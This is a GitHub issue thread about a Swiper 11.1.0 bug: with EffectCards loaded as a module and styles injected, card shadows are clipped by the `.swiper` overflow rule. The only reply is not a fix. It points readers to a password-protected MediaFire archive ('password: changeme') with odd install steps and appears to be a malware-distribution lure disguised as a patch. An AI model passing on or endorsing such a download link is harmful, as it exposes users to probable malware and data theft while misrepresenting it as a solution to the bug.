### ISSUE TITLE
Shadow are not visible when using EffectCards as module only

### ISSUE THREAD

**Issue by imagoiq** [nolimits4web/swiper#7704]
### Check that this is really a bug

- [X] I confirm

### Reproduction link

https://codesandbox.io/p/sandbox/swiper-effect-cards-forked-97x7ct?workspaceId=d0f99a06-a245-49d5-bbe4-3c747243a9ae

### Bug description

When using EffectCards as module (so without bundling) and inject module style with `injectStylesUrls`, cards shadow are not visible and the cards are cut when grabbing.

The `.swiper-cards` class should add `overflow:visible` to make it works, but it appears that with this configuration (injecting style vs constructed stylesheet) the specifity is won with the `.swiper` class which has `overflow:hidden`.

### Swiper version

11.1.0

### Platform/Target and Browser Versions

any

### Validations

- [X] Follow our [Code of Conduct](https://github.com/nolimits4web/swiper/blob/master/CODE_OF_CONDUCT.md)
- [X] Read the [docs](https://swiperjs.com/swiper-api).
- [X] Check that there isn't already an issue that request the same feature to avoid creating a duplicate.
- [X] Make sure this is a Swiper issue and not a framework-specific issue

### Would you like to open a PR for this bug?

- [ ] I'm willing to open a PR

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
